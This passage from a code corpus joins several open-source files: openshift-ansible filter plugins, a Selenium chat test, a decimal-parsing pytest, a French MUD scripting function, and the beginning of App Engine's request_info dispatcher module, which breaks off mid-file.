certificate['names'].append(str(cert.get_subject().commonName.decode()))
for i in range(cert.get_extension_count()):
if cert.get_extension(i).get_short_name() == 'subjectAltName':
for name in str(cert.get_extension(i)).split(', '):
if 'DNS:' in name:
certificate['names'].append(name.replace('DNS:', ''))
except Exception:
raise errors.AnsibleFilterError(("|failed to parse certificate '%s', " % certificate['certfile'] +
"please specify certificate names in host inventory"))
certificate['names'] = list(set(certificate['names']))
if 'cafile' not in certificate:
certificate['names'] = [name for name in certificate['names'] if name not in internal_hostnames]
if not certificate['names']:
raise errors.AnsibleFilterError(("|failed to parse certificate '%s' or " % certificate['certfile'] +
"detected a collision with internal hostname, please specify " +
"certificate names in host inventory"))
for certificate in certificates:
# Update paths for configuration
certificate['certfile'] = os.path.join(named_certs_dir, os.path.basename(certificate['certfile']))
certificate['keyfile'] = os.path.join(named_certs_dir, os.path.basename(certificate['keyfile']))
if 'cafile' in certificate:
certificate['cafile'] = os.path.join(named_certs_dir, os.path.basename(certificate['cafile']))
return certificates
def lib_utils_oo_parse_certificate_san(certificate):
""" Parses SubjectAlternativeNames from a PEM certificate.
Ex: certificate = '''-----BEGIN CERTIFICATE-----
MIIEcjCCAlqgAwIBAgIBAzANBgkqhkiG9w0BAQsFADAhMR8wHQYDVQQDDBZldGNk
LXNpZ25lckAxNTE2ODIwNTg1MB4XDTE4MDEyNDE5MDMzM1oXDTIzMDEyMzE5MDMz
M1owHzEdMBsGA1UEAwwUbWFzdGVyMS5hYnV0Y2hlci5jb20wggEiMA0GCSqGSIb3
DQEBAQUAA4IBDwAwggEKAoIBAQD4wBdWXNI3TF1M0b0bEIGyJPvdqKeGwF5XlxWg
NoA1Ain/Xz0N1SW5pXW2CDo9HX+ay8DyhzR532yrBa+RO3ivNCmfnexTQinfSLWG
mBEdiu7HO3puR/GNm74JNyXoEKlMAIRiTGq9HPoTo7tNV5MLodgYirpHrkSutOww
DfFSrNjH/ehqxwQtrIOnTAHigdTOrKVdoYxqXblDEMONTPLI5LMvm4/BqnAVaOyb
9RUzND6lxU/ei3FbUS5IoeASOHx0l1ifxae3OeSNAimm/RIRo9rieFNUFh45TzID
elsdGrLB75LH/gnRVV1xxVbwPN6xW1mEwOceRMuhIArJQ2G5AgMBAAGjgbYwgbMw
UQYDVR0jBEowSIAUXTqN88vCI6E7wONls3QJ4/63unOhJaQjMCExHzAdBgNVBAMM
FmV0Y2Qtc2lnbmVyQDE1MTY4MjA1ODWCCQDMaopfom6OljAMBgNVHRMBAf8EAjAA
MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIFoDAdBgNVHQ4EFgQU7l05
OYeY3HppL6/0VJSirudj8t0wDwYDVR0RBAgwBocEwKh6ujANBgkqhkiG9w0BAQsF
AAOCAgEAFU8sicE5EeQsUPnFEqDvoJd1cVE+8aCBqkW0++4GsVw2A/JOJ3OBJL6r
BV3b1u8/e8xBNi8hPi42Q+LWBITZZ/COFyhwEAK94hcr7eZLCV2xfUdMJziP4Qkh
/WRN7vXHTtJ6NP/d6A22SPbtnMSt9Y6G8y9qa5HBrqIqmkYbLzDw/SdZbDbuGhRk
xUwg2ahXNblVoE5P6rxPONgXliA94telZ1/61iyrVaiGQb1/GUP/DRfvvR4dOCrA
lMosW6fm37Wdi/8iYW+aDPWGS+yVK/sjSnHNjxqvrzkfGk+COa5riT9hJ7wZY0Hb
YiJS74SZgZt/nnr5PI2zFRUiZLECqCkZnC/sz29i+irLabnq7Cif9Mv+TUcXWvry
TdJuaaYdTSMRSUkDd/c9Ife8tOr1i1xhFzDNKNkZjTVRk1MBquSXndVCDKucdfGi
YoWm+NDFrayw8yxK/KTHo3Db3lu1eIXTHxriodFx898b//hysHr4hs4/tsEFUTZi
705L2ScIFLfnyaPby5GK/3sBIXtuhOFM3QV3JoYKlJB5T6wJioVoUmSLc+UxZMeE
t9gGVQbVxtLvNHUdW7uKQ5pd76nIJqApQf8wg2Pja8oo56fRZX2XLt8nm9cswcC4
Y1mDMvtfxglQATwMTuoKGdREuu1mbdb8QqdyQmZuMa72q+ax2kQ=
-----END CERTIFICATE-----'''
returns ['192.168.122.186']
"""
if not HAS_OPENSSL:
raise errors.AnsibleFilterError("|missing OpenSSL python bindings")
names = []
try:
lcert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, certificate)
for i in range(lcert.get_extension_count()):
if lcert.get_extension(i).get_short_name() == 'subjectAltName':
sanstr = str(lcert.get_extension(i))
sanstr = sanstr.replace('DNS:', '')
sanstr = sanstr.replace('IP Address:', '')
names = sanstr.split(', ')
except Exception:
raise errors.AnsibleFilterError("|failed to parse certificate")
return names
def lib_utils_oo_generate_secret(num_bytes):
""" generate a session secret """
if not isinstance(num_bytes, int):
raise errors.AnsibleFilterError("|failed expects num_bytes is int")
return b64encode(os.urandom(num_bytes)).decode('utf-8')
def lib_utils_to_padded_yaml(data, level=0, indent=2, **kw):
""" returns a yaml snippet padded to match the indent level you specify """
if data in [None, ""]:
return ""
try:
transformed = u(yaml.dump(data, indent=indent, allow_unicode=True,
default_flow_style=False,
Dumper=AnsibleDumper, **kw))
padded = "\n".join([" " * level * indent + line for line in transformed.splitlines()])
return "\n{0}".format(padded)
except Exception as my_e:
raise errors.AnsibleFilterError('Failed to convert: %s' % my_e)
def lib_utils_oo_image_tag_to_rpm_version(version, include_dash=False):
""" Convert an image tag string to an RPM version if necessary
Empty strings and strings that are already in rpm version format
are ignored. Also remove non semantic version components.
Ex. v3.2.0.10 -> -3.2.0.10
v1.2.0-rc1 -> -1.2.0
"""
if not isinstance(version, string_types):
raise errors.AnsibleFilterError("|failed expects a string or unicode")
if version.startswith("v"):
version = version[1:]
# Strip release from requested version, we no longer support this.
version = version.split('-')[0]
if include_dash and version and not version.startswith("-"):
version = "-" + version
return version
def lib_utils_oo_hostname_from_url(url):
""" Returns the hostname contained in a URL
Ex: https://ose3-master.example.com/v1/api -> ose3-master.example.com
"""
if not isinstance(url, string_types):
raise errors.AnsibleFilterError("|failed expects a string or unicode")
parse_result = urlparse(url)
if parse_result.netloc != '':
return parse_result.netloc
else:
# netloc wasn't parsed, assume url was missing scheme and path
return parse_result.path
# pylint: disable=invalid-name, unused-argument
def lib_utils_oo_loadbalancer_frontends(
api_port, servers_hostvars, use_nuage=False, nuage_rest_port=None):
"""TODO: Document me."""
loadbalancer_frontends = [{'name': 'atomic-openshift-api',
'mode': 'tcp',
'options': ['tcplog'],
'binds': ["*:{0}".format(api_port)],
'default_backend': 'atomic-openshift-api'}]
if bool(strtobool(str(use_nuage))) and nuage_rest_port is not None:
loadbalancer_frontends.append({'name': 'nuage-monitor',
'mode': 'tcp',
'options': ['tcplog'],
'binds': ["*:{0}".format(nuage_rest_port)],
'default_backend': 'nuage-monitor'})
return loadbalancer_frontends
# pylint: disable=invalid-name
def lib_utils_oo_loadbalancer_backends(
api_port, servers_hostvars, use_nuage=False, nuage_rest_port=None):
"""TODO: Document me."""
loadbalancer_backends = [{'name': 'atomic-openshift-api',
'mode': 'tcp',
'option': 'tcplog',
'balance': 'source',
'servers': haproxy_backend_masters(servers_hostvars, api_port)}]
if bool(strtobool(str(use_nuage))) and nuage_rest_port is not None:
# pylint: disable=line-too-long
loadbalancer_backends.append({'name': 'nuage-monitor',
'mode': 'tcp',
'option': 'tcplog',
'balance': 'source',
'servers': haproxy_backend_masters(servers_hostvars, nuage_rest_port)})
return loadbalancer_backends
def lib_utils_oo_random_word(length, source='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):
"""Generates a random string of given length from a set of alphanumeric characters.
The default source uses [a-z][A-Z][0-9]
Ex:
- lib_utils_oo_random_word(3) => aB9
- lib_utils_oo_random_word(4, source='012') => 0123
"""
return ''.join(random.choice(source) for i in range(length))
def lib_utils_oo_selector_to_string_list(user_dict):
"""Convert a dict of selectors to a key=value list of strings
Given input of {'region': 'infra', 'zone': 'primary'} returns a list
of items as ['node-role.kubernetes.io/infra=true', 'zone=primary']
"""
selectors = []
for key in user_dict:
selectors.append("{}={}".format(key, user_dict[key]))
return selectors
def lib_utils_oo_filter_sa_secrets(sa_secrets, secret_hint='-token-'):
"""Parse the Service Account Secrets list, `sa_secrets`, (as from
oc_serviceaccount_secret:state=list) and return the name of the secret
containing the `secret_hint` string. For example, by default this will
return the name of the secret holding the SA bearer token.
Only provide the 'results' object to this filter. This filter expects
to receive a list like this:
[
{
"name": "management-admin-dockercfg-p31s2"
},
{
"name": "management-admin-token-bnqsh"
}
]
Returns:
* `secret_name` [string] - The name of the secret matching the
`secret_hint` parameter. By default this is the secret holding the
SA's bearer token.
Example playbook usage:
Register a return value from oc_serviceaccount_secret with and pass
that result to this filter plugin.
- name: Get all SA Secrets
oc_serviceaccount_secret:
state: list
service_account: management-admin
namespace: management-infra
register: sa
- name: Save the SA bearer token secret name
set_fact:
management_token: "{{ sa.results | lib_utils_oo_filter_sa_secrets }}"
- name: Get the SA bearer token value
oc_secret:
state: list
name: "{{ management_token }}"
namespace: management-infra
decode: true
register: sa_secret
- name: Print the bearer token value
debug:
var: sa_secret.results.decoded.token
"""
secret_name = None
for secret in sa_secrets:
# each secret is a hash
if secret['name'].find(secret_hint) == -1:
continue
else:
secret_name = secret['name']
break
return secret_name
def lib_utils_oo_l_of_d_to_csv(input_list):
"""Map a list of dictionaries, input_list, into a csv string
of json values.
Example input:
[{'var1': 'val1', 'var2': 'val2'}, {'var1': 'val3', 'var2': 'val4'}]
Example output:
u'{"var1": "val1", "var2": "val2"},{"var1": "val3", "var2": "val4"}'
"""
return ','.join(json.dumps(x) for x in input_list)
def map_from_pairs(source, delim="="):
''' Returns a dict given the source and delim delimited '''
if source == '':
return dict()
return dict(item.split(delim) for item in source.split(","))
def map_to_pairs(source, delim="="):
''' Returns a comma separated str given the source as a dict '''
# Some default selectors are empty strings.
if source == {} or source == '':
return str()
return ','.join(["{}{}{}".format(key, delim, value) for key, value in iteritems(source)])
def lib_utils_oo_etcd_host_urls(hosts, use_ssl=True, port='2379'):
'''Return a list of urls for etcd hosts'''
urls = []
port = str(port)
proto = "https://" if use_ssl else "http://"
for host in hosts:
url_string = "{}{}:{}".format(proto, host, port)
urls.append(url_string)
return urls
def lib_utils_mutate_htpass_provider(idps):
'''Updates identityProviders list to mutate filename of htpasswd auth
to hardcode filename = /etc/origin/master/htpasswd'''
old_keys = ('filename', 'fileName', 'file_name')
for idp in idps:
if 'provider' in idp:
idp_p = idp['provider']
if idp_p['kind'] == 'HTPasswdPasswordIdentityProvider':
for old_key in old_keys:
if old_key in idp_p:
idp_p.pop(old_key)
idp_p['file'] = '/etc/origin/master/htpasswd'
return idps
def lib_utils_oo_oreg_image(image_default, oreg_url):
'''Converts default image string to utilize oreg_url, if defined.
oreg_url should be passed in as string "None" if undefined.
Example input: "quay.io/coreos/etcd:v99",
"example.com/openshift/origin-${component}:${version}"
Example output: "example.com/coreos/etcd:v99"'''
# if no oreg_url is specified, we just return the original default
if oreg_url == 'None':
return image_default
oreg_parts = oreg_url.rsplit('/', 2)
if len(oreg_parts) < 2:
raise errors.AnsibleFilterError("oreg_url malformed: {}".format(oreg_url))
if not (len(oreg_parts) >= 3 and '.' in oreg_parts[0]):
# oreg_url does not include host information; we'll just return etcd default
return image_default
image_parts = image_default.split('/')
if len(image_parts) < 3:
raise errors.AnsibleFilterError("default image dictionary malformed, do not adjust this value.")
return '/'.join([oreg_parts[0], image_parts[1], image_parts[2]])
def lib_utils_oo_list_of_dict_to_dict_from_key(input_list, keyname):
'''Converts a list of dictionaries to a dictionary with keyname: dictionary
Example input: [{'name': 'first', 'url': 'x.com'}, {'name': 'second', 'url': 'y.com'}],
'name'
Example output: {'first': {'url': 'x.com', 'name': 'first'}, 'second': {'url': 'y.com', 'name': 'second'}}'''
output_dict = {}
for item in input_list:
retrieved_val = item.get(keyname)
if keyname is not None:
output_dict[retrieved_val] = item
return output_dict
class FilterModule(object):
""" Custom ansible filter mapping """
# pylint: disable=no-self-use, too-few-public-methods
def filters(self):
""" returns a mapping of filters to methods """
return {
"lib_utils_oo_select_keys": lib_utils_oo_select_keys,
"lib_utils_oo_select_keys_from_list": lib_utils_oo_select_keys_from_list,
"lib_utils_oo_collect": lib_utils_oo_collect,
"lib_utils_oo_pdb": lib_utils_oo_pdb,
"lib_utils_oo_prepend_strings_in_list": lib_utils_oo_prepend_strings_in_list,
"lib_utils_oo_dict_to_list_of_dict": lib_utils_oo_dict_to_list_of_dict,
"lib_utils_oo_split": lib_utils_oo_split,
"lib_utils_oo_dict_to_keqv_list": lib_utils_oo_dict_to_keqv_list,
"lib_utils_oo_list_to_dict": lib_utils_oo_list_to_dict,
"lib_utils_oo_parse_named_certificates": lib_utils_oo_parse_named_certificates,
"lib_utils_oo_parse_certificate_san": lib_utils_oo_parse_certificate_san,
"lib_utils_oo_generate_secret": lib_utils_oo_generate_secret,
"lib_utils_oo_image_tag_to_rpm_version": lib_utils_oo_image_tag_to_rpm_version,
"lib_utils_oo_hostname_from_url": lib_utils_oo_hostname_from_url,
"lib_utils_oo_loadbalancer_frontends": lib_utils_oo_loadbalancer_frontends,
"lib_utils_oo_loadbalancer_backends": lib_utils_oo_loadbalancer_backends,
"lib_utils_to_padded_yaml": lib_utils_to_padded_yaml,
"lib_utils_oo_random_word": lib_utils_oo_random_word,
"lib_utils_oo_selector_to_string_list": lib_utils_oo_selector_to_string_list,
"lib_utils_oo_filter_sa_secrets": lib_utils_oo_filter_sa_secrets,
"lib_utils_oo_l_of_d_to_csv": lib_utils_oo_l_of_d_to_csv,
"map_from_pairs": map_from_pairs,
"map_to_pairs": map_to_pairs,
"lib_utils_oo_etcd_host_urls": lib_utils_oo_etcd_host_urls,
"lib_utils_mutate_htpass_provider": lib_utils_mutate_htpass_provider,
"lib_utils_oo_oreg_image": lib_utils_oo_oreg_image,
"lib_utils_oo_list_of_dict_to_dict_from_key": lib_utils_oo_list_of_dict_to_dict_from_key,
}
|
ewolinetz/openshift-ansible
|
roles/lib_utils/filter_plugins/oo_filters.py
|
Python
|
apache-2.0
| 28,674
|
#!/usr/bin/python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TODO: High-level file comment."""
import sys
def main(argv):
pass
if __name__ == '__main__':
main(sys.argv)
import setup
from selenium.webdriver.common.by import By
## Test setup
playerNames = {
'zella': 'ZellaTheUltimate',
'deckerd': 'DeckerdTheHesitant',
'moldavi': 'MoldaviTheMoldavish',
'drake': 'Drackan',
'zeke': 'Zeke',
'jack': 'JackSlayerTheBeanSlasher'
}
def getPathToElement(playerName, tag, name):
xpathForPageElement = "//*[contains(@id, 'chat-page-%s')]//%s[contains(@name, '%s')]"
return xpathForPageElement % (playerName, tag, name)
def closeNotifications(driver):
driver.Click([[By.NAME, 'close-notification']])
## Run admin chat test
driver = setup.MakeDriver()
driver.WaitForGameLoaded()
actingPlayer = 'zeke'
actingPlayerName = playerNames[actingPlayer]
chatName = actingPlayerName + ' & HvZ CDC'
# Switch to right user and open chat page
driver.SwitchUser(actingPlayer)
# Create chat with admin
driver.FindDrawerItem('Chat with Admins')
driver.RetryUntil(
lambda: driver.DrawerMenuClick('Chat with Admins'),
lambda: driver.FindElement([[By.NAME, "chat-room-%s" % chatName]])
)
# Type a message into the chat
xpathTextarea = getPathToElement(actingPlayerName, 'textarea', 'input-' + chatName)
xpathSend = getPathToElement(actingPlayerName, 'paper-button', 'submit-' + chatName)
driver.FindElement([[By.NAME, 'input-%s' % chatName], [By.XPATH, xpathTextarea]])
driver.SendKeys([[By.NAME, 'input-%s' % chatName], [By.XPATH, xpathTextarea]],
'Hi im %s, how do i know if im the possessed zombie?' % actingPlayerName)
driver.Click([[By.NAME, 'submit-%s' % chatName], [By.XPATH, xpathSend]])
def CheckAdminSeesMessage(admin, chatName):
driver.SwitchUser(admin)
closeNotifications(driver)
driver.DrawerMenuClick('Admin Chats')
driver.Click([[By.TAG_NAME, 'ghvz-admin-chat-page'], [By.NAME, 'drawer' + chatName]])
driver.ExpectContains([
[By.TAG_NAME, 'ghvz-admin-chat-page'],
[By.NAME, 'message-%s-Hi im %s, how do i know if im the possessed zombie?' % (chatName, actingPlayerName)],
[By.CLASS_NAME, 'message-bubble']],
'Hi im %s, how do i know if im the possessed zombie?' % actingPlayerName)
# Check that every admin sees the chat and message
CheckAdminSeesMessage('zella', chatName)
CheckAdminSeesMessage('moldavi', chatName)
# Non-Admin should leave admin chat
driver.SwitchUser(actingPlayer)
driver.DrawerMenuClick(chatName)
driver.Click([[By.TAG_NAME, 'ghvz-drawer'], [By.NAME, 'drawer' + chatName]])
driver.Click([[By.TAG_NAME, 'ghvz-display-page'], [By.NAME, 'chat-card'], [By.NAME, 'chat-info-' + chatName]])
xpathChatDrawer = getPathToElement(actingPlayerName, 'div', 'chat-drawer-%s' % chatName)
driver.FindElement([[By.XPATH, xpathChatDrawer]])
xpathLeaveButton = getPathToElement(actingPlayerName, 'a', 'chat-drawer-leave')
driver.FindElement([[By.XPATH, xpathLeaveButton]])
driver.Click([[By.XPATH, xpathLeaveButton]])
# TODO: make leave button work the same way on mobile as it does on web
# Chat should be hidden, verify chat with admin button is available after leaving admin chat
driver.FindDrawerItem('Chat with Admins')
# Reopen admin chat
driver.DrawerMenuClick('Chat with Admins')
# Verify original message is still in chat room
driver.ExpectContains([
[By.NAME, 'chat-card'],
[By.NAME, 'message-%s-Hi im %s, how do i know if im the possessed zombie?' % (chatName, actingPlayerName)],
[By.CLASS_NAME, 'message-bubble']],
'Hi im %s, how do i know if im the possessed zombie?' % actingPlayerName)
# Player opens drawer and hides chat room
xpathChatDrawerButton = getPathToElement(actingPlayerName, 'paper-icon-button', 'chat-info-' + chatName)
driver.Click([[By.XPATH, xpathChatDrawerButton]])
xpathChatDrawer = getPathToElement(actingPlayerName, 'div', 'chat-drawer-%s' % chatName)
driver.FindElement([[By.XPATH, xpathChatDrawer]])
xpathLeaveButton = getPathToElement(actingPlayerName, 'a', 'chat-drawer-leave')
driver.FindElement([[By.XPATH, xpathLeaveButton]])
driver.Click([[By.XPATH, xpathLeaveButton]])
driver.DontFindElement([
[By.NAME, 'chat-card'],
[By.NAME, 'ChatRoom: Zeke & HvZ CDC']])
# Admin messages chat after player left
actingPlayer = 'moldavi'
driver.SwitchUser(actingPlayer)
driver.DrawerMenuClick(chatName)
actingPlayerName = playerNames[actingPlayer]
xpathTextarea = getPathToElement(actingPlayerName, 'textarea', 'input-' + chatName)
xpathSend = getPathToElement(actingPlayerName, 'paper-button', 'submit-' + chatName)
driver.FindElement([[By.XPATH, xpathTextarea]])
driver.SendKeys([[By.XPATH, xpathTextarea]],
'Mere player, did you just leave the chat room!?')
driver.Click([[By.XPATH, xpathSend]])
# Make sure admin chat is visible again since there was a new message
actingPlayer = 'zeke'
driver.SwitchUser(actingPlayer)
driver.DrawerMenuClick(chatName)
driver.FindDrawerItem('Zeke & HvZ CDC')
driver.Quit()
|
google/playhvz
|
web/tests/adminchat.py
|
Python
|
apache-2.0
| 5,502
|
__version__ = '0.2.0'
from .common import TenX_Runs, Plates
__all__ = TenX_Runs, Plates
|
czbiohub/singlecell-dash
|
singlecell_dash/__init__.py
|
Python
|
mit
| 89
|
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from decimal import Decimal
import pytest
from shuup.utils.numbers import parse_decimal_string
@pytest.mark.parametrize("input_val, expected_val", [
(0.0, Decimal('0.0')),
(1.1, Decimal('1.1')),
(-1.1, Decimal('-1.1')),
(1e10, Decimal('10000000000')),
(1e10, Decimal('1e10')),
(1e-10, Decimal('0.0000000001')),
(1e-10, Decimal('1e-10'))
])
def test_parse_decimal_string_with_float_input(input_val, expected_val):
result = parse_decimal_string(input_val)
assert result == expected_val
|
hrayr-artunyan/shuup
|
shuup_tests/utils/test_numbers.py
|
Python
|
agpl-3.0
| 745
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant la fonction element."""
from primaires.scripting.fonction import Fonction
class ClasseFonction(Fonction):
"""Retourne l'élément du personnage."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.element_personnage, "Personnage")
@staticmethod
def element_personnage(personnage):
"""Retourne l'élément du personnage ou "aucun".
L'élément retourné est censément "eau", "terre", "feu" ou "air". Si
le personnage n'a aucun élément définit, retourne "aucun".
"""
if personnage.element:
return personnage.element
return "aucun"
|
vlegoff/tsunami
|
src/secondaires/magie/fonctions/element.py
|
Python
|
bsd-3-clause
| 2,224
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Allows API stubs to access request and system state when handling calls.
Certain API stubs require access to information about the request that triggered
the API call (e.g. user_service_stub needs to know the host name of the request
to generate continuation URLs) or system state (e.g. modules_stub).
Other stubs (e.g. taskqueue_stub, channel_stub) need to be able to dispatch
requests within the system.
An instance of a RequestInfo subclass is passed to stubs that require these
capabilities.
"""
import logging
import operator
import os
import urllib
class Error(Exception):
pass
class ModuleDoesNotExistError(Error):
"""The provided module does not exist."""
class VersionDoesNotExistError(Error):
"""The provided version does not exist."""
class InvalidInstanceIdError(Error):
"""The provided instance ID is invalid."""
class NotSupportedWithAutoScalingError(Error):
"""The requested operation is not supported for auto-scaling modules."""
class ModuleAlreadyStartedError(Error):
"""The module is already started."""
class ModuleAlreadyStoppedError(Error):
"""The module is already stopped."""
class BackgroundThreadLimitReachedError(Error):
"""The instance is at its background thread capacity."""
class ResponseTuple(tuple):
'ResponseTuple(status, headers, content)'
__slots__ = ()
_fields = ('status', 'headers', 'content')
def __new__(cls, status, headers, content):
return tuple.__new__(cls, (status, headers, content))
@classmethod
def _make(cls, iterable, new=tuple.__new__, len=len):
result = new(cls, iterable)
if len(result) != 3:
raise TypeError('Expected 3 arguments, got %d' % len(result))
return result
def __repr__(self):
return 'ResponseTuple(status=%r, headers=%r, content=%r)' % self
def _asdict(self):
return dict(zip(self._fields, self))
__dict__ = property(_asdict)
def _replace(self, **kwds):
result = self._make(map(kwds.pop, ('status', 'headers', 'content'), self))
if kwds:
raise ValueError('Got unexpected field names: %r' % kwds.keys())
return result
def __getnewargs__(self):
return tuple(self)
status = property(operator.itemgetter(0), doc='Alias for field number 0')
headers = property(operator.itemgetter(1), doc='Alias for field number 1')
content = property(operator.itemgetter(2), doc='Alias for field number 2')
class Dispatcher(object):
"""Provides information about and dispatches requests to modules."""
def get_module_names(self):
"""Returns a list of module names."""
raise NotImplementedError()
def get_versions(self, module):
"""Returns a list of versions for a module.
Args:
module: A str containing the name of the module.
Returns:
A list of str containing the versions for the specified module.
Raises:
ModuleDoesNotExistError: The module does not exist.
"""
raise NotImplementedError()
def get_default_version(self, module):
"""Returns the default version for a module.
Args:
module: A str containing the name of the module.
Returns:
A str containing the default version for the specified module.
Raises:
ModuleDoesNotExistError: The module does not exist.
"""
raise NotImplementedError()
def get_hostname(self, module, version, instance=None):
"""Returns the hostname for a (module, version, instance) tuple.
If instance is set, this will return a hostname for that particular
instances. Otherwise, it will return the hostname for load-balancing.
Args:
module: A str containing the name of the module.
version: A str containing the version.
instance: An optional str containing the instance ID.
Returns:
A str containing the hostname.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
InvalidInstanceIdError: The instance ID is not valid for the
module/version or the module/version uses automatic scaling.
"""
raise NotImplementedError()
def set_num_instances(self, module, version, instances):
"""Sets the number of instances to run for a version of a module.
Args:
module: A str containing the name of the module.
version: A str containing the version.
instances: An int containing the number of instances to run.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
raise NotImplementedError()
def get_num_instances(self, module, version):
"""Gets the number of instances running for a version of a module.
Args:
module: A str containing the name of the module.
version: A str containing the version.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
raise NotImplementedError()
def start_module(self, module, version):
"""Starts a module.
Args:
module: A str containing the name of the module.
version: A str containing the version.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
raise NotImplementedError()
def stop_module(self, module, version):
"""Stops a module.
Args:
module: A str containing the name of the module.
version: A str containing the version.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
raise NotImplementedError()
def add_event(self, runnable, eta, service=None, event_id=None):
"""Add a callable to be run at the specified time.
Args:
runnable: A callable object to call at the specified time.
eta: An int containing the time to run the event, in seconds since the
epoch.
service: A str containing the name of the service that owns this event.
This should be set if event_id is set.
event_id: A str containing the id of the event. If set, this can be passed
to update_event to change the time at which the event should run.
"""
raise NotImplementedError()
def update_event(self, eta, service, event_id):
"""Update the eta of a scheduled event.
Args:
eta: An int containing the time to run the event, in seconds since the
epoch.
service: A str containing the name of the service that owns this event.
event_id: A str containing the id of the event to update.
"""
raise NotImplementedError()
def add_request(self, method, relative_url, headers, body, source_ip,
module_name=None, version=None, instance_id=None):
"""Process an HTTP request.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
module_name: An optional str containing the module name to service this
request. If unset, the request will be dispatched to the default
module.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched to the default version.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched to
according to the load-balancing for the module and version.
Returns:
A ResponseTuple containing the response information for the HTTP request.
"""
raise NotImplementedError()
def add_async_request(self, method, relative_url, headers, body, source_ip,
module_name=None, version=None, instance_id=None):
"""Dispatch an HTTP request asynchronously.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
module_name: An optional str containing the module name to service this
request. If unset, the request will be dispatched to the default
module.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched to the default version.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched to
according to the load-balancing for the module and version.
"""
raise NotImplementedError()
def send_background_request(self, module_name, version, instance,
background_request_id):
"""Dispatch a background thread request.
Args:
module_name: A str containing the module name to service this
request.
version: A str containing the version to service this request.
instance: The instance to service this request.
background_request_id: A str containing the unique background thread
request identifier.
Raises:
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
BackgroundThreadLimitReachedError: The instance is at its background
thread capacity.
"""
raise NotImplementedError()
class _LocalFakeDispatcher(Dispatcher):
"""A fake Dispatcher implementation usable by tests."""
def __init__(self,
module_names=None,
module_name_to_versions=None,
module_name_to_default_versions=None,
module_name_to_version_to_hostname=None):
super(_LocalFakeDispatcher, self).__init__()
if module_names is None:
module_names = ['default']
if module_name_to_versions is None:
module_name_to_versions = {'default': ['1']}
if module_name_to_default_versions is None:
module_name_to_default_versions = {'default': '1'}
if module_name_to_version_to_hostname is None:
module_name_to_version_to_hostname = {'default': {'1': 'localhost:8080'}}
self._module_names = module_names
self._module_name_to_versions = module_name_to_versions
self._module_name_to_default_versions = module_name_to_default_versions
self._module_name_to_version_to_hostname = (
